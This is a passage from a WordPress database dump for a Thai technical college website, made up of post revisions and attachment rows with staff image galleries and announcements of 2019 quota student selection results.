alt=\"\" width=\"193\" height=\"238\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\"><img class=\"aligncenter size-full wp-image-4647\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\" alt=\"\" width=\"713\" height=\"620\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1623 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1626 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-17-46.jpg\" alt=\"\" width=\"244\" height=\"311\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-12-24 15:22:17', '2018-12-24 08:22:17', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(4820, 3, '2018-12-24 15:26:58', '2018-12-24 08:26:58', '', '24-12-2561 15-26-33', '', 'inherit', 'closed', 'closed', '', '24-12-2561-15-26-33', '', '', '2018-12-24 15:26:58', '2018-12-24 08:26:58', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/24-12-2561-15-26-33.png', 0, 'attachment', 'image/png', 0),
(4821, 3, '2018-12-24 15:27:06', '2018-12-24 08:27:06', '', 'Picture2', '', 'inherit', 'closed', 'closed', '', 'picture2', '', '', '2018-12-24 15:27:06', '2018-12-24 08:27:06', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/Picture2.png', 0, 'attachment', 'image/png', 0),
(4822, 3, '2018-12-24 15:27:50', '2018-12-24 08:27:50', '<a href=\"/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg\"><img class=\"aligncenter size-full wp-image-3932\" src=\"/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a><a href=\"/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg\"><img class=\"aligncenter wp-image-3933\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg\" alt=\"\" width=\"382\" height=\"100\" /></a><a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-3934 size-full\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-43-33.jpg\" alt=\"\" width=\"195\" height=\"240\" /></a><a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-2067 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg\" alt=\"\" width=\"913\" height=\"318\" /></a>\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3/\"><img class=\"aligncenter wp-image-3452 size-full\" src=\"/wp-content/uploads/2018/07/นางศิริพรรณ-ยับยั้ง.jpg\" alt=\"\" width=\"196\" height=\"242\" /></a>\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3/\"><img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" /></a><a href=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\"><img class=\"aligncenter size-full wp-image-4604\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\" alt=\"\" width=\"656\" height=\"339\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg\"><img class=\"aligncenter size-full wp-image-4815\" src=\"/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a><a href=\"/wp-content/uploads/2018/12/Picture1-1.png\"><img class=\"aligncenter wp-image-4816\" src=\"/wp-content/uploads/2018/12/Picture1-1.png\" alt=\"\" width=\"353\" height=\"103\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/11/3151420245.jpg\"><img class=\"aligncenter size-full wp-image-4607\" src=\"/wp-content/uploads/2018/11/3151420245.jpg\" alt=\"\" width=\"430\" height=\"319\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/24-12-2561-15-26-33.png\"><img class=\"aligncenter size-full wp-image-4820\" src=\"/wp-content/uploads/2018/12/24-12-2561-15-26-33.png\" alt=\"\" width=\"202\" height=\"249\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/Picture2.png\"><img class=\"aligncenter wp-image-4821\" src=\"/wp-content/uploads/2018/12/Picture2.png\" alt=\"\" width=\"354\" height=\"103\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%AA%E0%B8%94%E0%B8%B8/\"><img class=\"aligncenter wp-image-4609 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-52-31.jpg\" alt=\"\" width=\"191\" height=\"237\" /></a>\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%AA%E0%B8%94%E0%B8%B8/\"><img class=\"aligncenter wp-image-3382\" src=\"/wp-content/uploads/2018/07/145623013221.jpg\" alt=\"\" width=\"370\" height=\"101\" /></a><a href=\"/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg\"><img class=\"aligncenter size-full wp-image-4611\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg\" alt=\"\" width=\"162\" height=\"204\" /></a><a href=\"/wp-content/uploads/2018/11/Picture1.png\"><img class=\"aligncenter wp-image-4612\" src=\"/wp-content/uploads/2018/11/Picture1.png\" alt=\"\" width=\"386\" height=\"103\" /></a> <a href=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\"><img class=\"aligncenter wp-image-4617 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\" alt=\"\" width=\"1109\" height=\"345\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1614 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a><a href=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\"><img class=\"aligncenter size-full wp-image-4645\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\" alt=\"\" width=\"563\" height=\"358\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1619 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\"><img class=\"aligncenter size-full wp-image-4647\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\" alt=\"\" width=\"713\" height=\"620\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1623 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1626 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-17-46.jpg\" alt=\"\" width=\"244\" height=\"311\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-12-24 15:27:50', '2018-12-24 08:27:50', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(4823, 3, '2018-12-24 15:29:10', '2018-12-24 08:29:10', '<a href=\"/wp-content/uploads/2018/12/24-12-2561-15-26-33.png\"><img class=\"aligncenter size-full wp-image-4820\" src=\"/wp-content/uploads/2018/12/24-12-2561-15-26-33.png\" alt=\"\" width=\"202\" height=\"249\" /></a><a href=\"/wp-content/uploads/2018/12/Picture2.png\"><img class=\"aligncenter wp-image-4821\" src=\"/wp-content/uploads/2018/12/Picture2.png\" alt=\"\" width=\"354\" height=\"103\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n ', 'งานการบัญชี', '', 'inherit', 'closed', 'closed', '', '1541-revision-v1', '', '', '2018-12-24 15:29:10', '2018-12-24 08:29:10', '', 1541, 'http://www.technicrayong.ac.th/1541-revision-v1/', 0, 'revision', '', 0),
(4824, 3, '2018-12-24 15:32:09', '2018-12-24 08:32:09', '', 'Picture4', '', 'inherit', 'closed', 'closed', '', 'picture4', '', '', '2018-12-24 15:32:09', '2018-12-24 08:32:09', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/Picture4.png', 0, 'attachment', 'image/png', 0),
(4825, 3, '2018-12-24 15:46:04', '2018-12-24 08:46:04', '<a href=\"/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg\"><img class=\"aligncenter size-full wp-image-3932\" src=\"/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a><a href=\"/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg\"><img class=\"aligncenter wp-image-3933\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg\" alt=\"\" width=\"382\" height=\"100\" /></a><a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-3934 size-full\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-43-33.jpg\" alt=\"\" width=\"195\" height=\"240\" /></a><a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-2067 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg\" alt=\"\" width=\"913\" height=\"318\" /></a>\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3/\"><img class=\"aligncenter wp-image-3452 size-full\" src=\"/wp-content/uploads/2018/07/นางศิริพรรณ-ยับยั้ง.jpg\" alt=\"\" width=\"196\" height=\"242\" /></a>\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3/\"><img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" /></a><a href=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\"><img class=\"aligncenter size-full wp-image-4604\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\" alt=\"\" width=\"656\" height=\"339\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg\"><img class=\"aligncenter size-full wp-image-4815\" src=\"/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a><a href=\"/wp-content/uploads/2018/12/Picture1-1.png\"><img class=\"aligncenter wp-image-4816\" src=\"/wp-content/uploads/2018/12/Picture1-1.png\" alt=\"\" width=\"353\" height=\"103\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/11/3151420245.jpg\"><img class=\"aligncenter size-full wp-image-4607\" src=\"/wp-content/uploads/2018/11/3151420245.jpg\" alt=\"\" width=\"430\" height=\"319\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/24-12-2561-15-26-33.png\"><img class=\"aligncenter size-full wp-image-4820\" src=\"/wp-content/uploads/2018/12/24-12-2561-15-26-33.png\" alt=\"\" width=\"202\" height=\"249\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/Picture2.png\"><img class=\"aligncenter wp-image-4821\" src=\"/wp-content/uploads/2018/12/Picture2.png\" alt=\"\" width=\"354\" height=\"103\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%AA%E0%B8%94%E0%B8%B8/\"><img class=\"aligncenter wp-image-4609 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-52-31.jpg\" alt=\"\" width=\"191\" height=\"237\" /></a>\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%AA%E0%B8%94%E0%B8%B8/\"><img class=\"aligncenter wp-image-3382\" src=\"/wp-content/uploads/2018/07/145623013221.jpg\" alt=\"\" width=\"370\" height=\"101\" /></a><a href=\"/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg\"><img class=\"aligncenter size-full wp-image-4611\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg\" alt=\"\" width=\"162\" height=\"204\" /></a><a href=\"/wp-content/uploads/2018/12/Picture4.png\"><img class=\"aligncenter wp-image-4824\" src=\"/wp-content/uploads/2018/12/Picture4.png\" alt=\"\" width=\"354\" height=\"103\" /></a><a href=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\"><img class=\"aligncenter wp-image-4617 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\" alt=\"\" width=\"1109\" height=\"345\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1614 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a><a href=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\"><img class=\"aligncenter size-full wp-image-4645\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\" alt=\"\" width=\"563\" height=\"358\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1619 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\"><img class=\"aligncenter size-full wp-image-4647\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\" alt=\"\" width=\"713\" height=\"620\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1623 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1626 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-17-46.jpg\" alt=\"\" width=\"244\" height=\"311\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-12-24 15:46:04', '2018-12-24 08:46:04', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(4826, 3, '2018-12-25 11:25:28', '2018-12-25 04:25:28', '<a href=\"/wp-content/uploads/2018/12/7-1-2562-14-59-23.png\"><img class=\"aligncenter wp-image-4914 size-full\" src=\"/wp-content/uploads/2018/12/7-1-2562-14-59-23.png\" alt=\"\" width=\"1033\" height=\"808\" /></a>\r\n<h1><span style=\"color: #ff0000;\">ดาวน์โหลดแบบฟอร์ม หนังสือมอบอำนาจ >></span><strong><span style=\"color: #ff0000;\"> <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/12/หนังสือมอบอำนาจ-สำหรับลงทะเบียน.pdf\">คลิก</a>!</span></strong></h1>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%82%E0%B8%84%E0%B8%A7%E0%B8%95%E0%B8%B2-%E0%B8%A0%E0%B8%B2%E0%B8%A2%E0%B9%83%E0%B8%99.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการคัดเลือกนักศึกษาโควตา (ภายใน) ปีการศึกษา ๒๕๖๒ หลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ผู้จบหลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%99%e0%b8%b1%e0%b8%81', '', '', '2019-01-07 15:05:50', '2019-01-07 08:05:50', '', 0, 'http://www.technicrayong.ac.th/?p=4826', 202, 'post', '', 0),
(4827, 3, '2018-12-25 11:24:47', '2018-12-25 04:24:47', '', 'ประกาศ ผลการคัดเลือกโควตา ภายใน', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b9%82%e0%b8%84%e0%b8%a7', '', '', '2018-12-25 11:24:47', '2018-12-25 04:24:47', '', 4826, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ประกาศ-ผลการคัดเลือกโควตา-ภายใน.pdf', 0, 'attachment', 'application/pdf', 0),
(4829, 3, '2018-12-25 11:25:28', '2018-12-25 04:25:28', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%82%E0%B8%84%E0%B8%A7%E0%B8%95%E0%B8%B2-%E0%B8%A0%E0%B8%B2%E0%B8%A2%E0%B9%83%E0%B8%99.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการคัดเลือกนักศึกษาโควตา (ภายใน) ปีการศึกษา ๒๕๖๒ หลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ผู้จบหลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.)', '', 'inherit', 'closed', 'closed', '', '4826-revision-v1', '', '', '2018-12-25 11:25:28', '2018-12-25 04:25:28', '', 4826, 'http://www.technicrayong.ac.th/4826-revision-v1/', 0, 'revision', '', 0),
(4830, 3, '2018-12-25 11:28:52', '2018-12-25 04:28:52', '<a href=\"/wp-content/uploads/2018/12/7-1-2562-14-59-23.png\"><img class=\"aligncenter wp-image-4914 size-full\" src=\"/wp-content/uploads/2018/12/7-1-2562-14-59-23.png\" alt=\"\" width=\"1033\" height=\"808\" /></a>\r\n<h1><span style=\"color: #ff0000;\">ดาวน์โหลดแบบฟอร์ม หนังสือมอบอำนาจ >></span><strong><span style=\"color: #ff0000;\"> <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/12/หนังสือมอบอำนาจ-สำหรับลงทะเบียน.pdf\">คลิก</a>!</span></strong></h1>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%82%E0%B8%84%E0%B8%A7%E0%B8%95%E0%B8%B2-%E0%B8%A0%E0%B8%B2%E0%B8%A2%E0%B8%99%E0%B8%AD%E0%B8%81edit.pdf.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการคัดเลือกนักเรียน นักศึกษาโควตา (ภายนอก) หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา ๒๕๖๒', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%99%e0%b8%b1-2', '', '', '2019-01-07 15:03:56', '2019-01-07 08:03:56', '', 0, 'http://www.technicrayong.ac.th/?p=4830', 201, 'post', '', 0),
(4831, 3, '2018-12-25 11:28:52', '2018-12-25 04:28:52', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%82%E0%B8%84%E0%B8%A7%E0%B8%95%E0%B8%B2-%E0%B8%A0%E0%B8%B2%E0%B8%A2%E0%B8%99%E0%B8%AD%E0%B8%81.pdf.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการคัดเลือกนักเรียน นักศึกษาโควตา (ภายนอก) หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4830-revision-v1', '', '', '2018-12-25 11:28:52', '2018-12-25 04:28:52', '', 4830, 'http://www.technicrayong.ac.th/4830-revision-v1/', 0, 'revision', '', 0),
(4832, 3, '2018-12-25 14:39:15', '2018-12-25 07:39:15', '', '25-12-2561 14-36-29', '', 'inherit', 'closed', 'closed', '', '25-12-2561-14-36-29', '', '', '2018-12-25 14:39:15', '2018-12-25 07:39:15', '', 4826, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/25-12-2561-14-36-29.png', 0, 'attachment', 'image/png', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4834, 3, '2018-12-25 14:41:30', '2018-12-25 07:41:30', '<a href=\"/wp-content/uploads/2018/12/25-12-2561-14-36-29.png\"><img class=\"aligncenter wp-image-4832 size-full\" src=\"/wp-content/uploads/2018/12/25-12-2561-14-36-29.png\" alt=\"\" width=\"1047\" height=\"815\" /></a>\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%82%E0%B8%84%E0%B8%A7%E0%B8%95%E0%B8%B2-%E0%B8%A0%E0%B8%B2%E0%B8%A2%E0%B9%83%E0%B8%99.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการคัดเลือกนักศึกษาโควตา (ภายใน) ปีการศึกษา ๒๕๖๒ หลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ผู้จบหลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.)', '', 'inherit', 'closed', 'closed', '', '4826-revision-v1', '', '', '2018-12-25 14:41:30', '2018-12-25 07:41:30', '', 4826, 'http://www.technicrayong.ac.th/4826-revision-v1/', 0, 'revision', '', 0),
(4835, 3, '2018-12-25 14:49:35', '2018-12-25 07:49:35', '', 'ประกาศ ผลการคัดเลือกโควตา ภายนอก.pdf', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b9%82%e0%b8%84-2', '', '', '2018-12-25 14:49:35', '2018-12-25 07:49:35', '', 4830, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ประกาศ-ผลการคัดเลือกโควตา-ภายนอก.pdf.pdf', 0, 'attachment', 'application/pdf', 0),
(4837, 3, '2018-12-25 14:50:09', '2018-12-25 07:50:09', '<a href=\"/wp-content/uploads/2018/12/25-12-2561-14-36-29.png\"><img class=\"aligncenter wp-image-4832 size-full\" src=\"/wp-content/uploads/2018/12/25-12-2561-14-36-29.png\" alt=\"\" width=\"1047\" height=\"815\" /></a>\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%82%E0%B8%84%E0%B8%A7%E0%B8%95%E0%B8%B2-%E0%B8%A0%E0%B8%B2%E0%B8%A2%E0%B8%99%E0%B8%AD%E0%B8%81.pdf.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการคัดเลือกนักเรียน นักศึกษาโควตา (ภายนอก) หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4830-revision-v1', '', '', 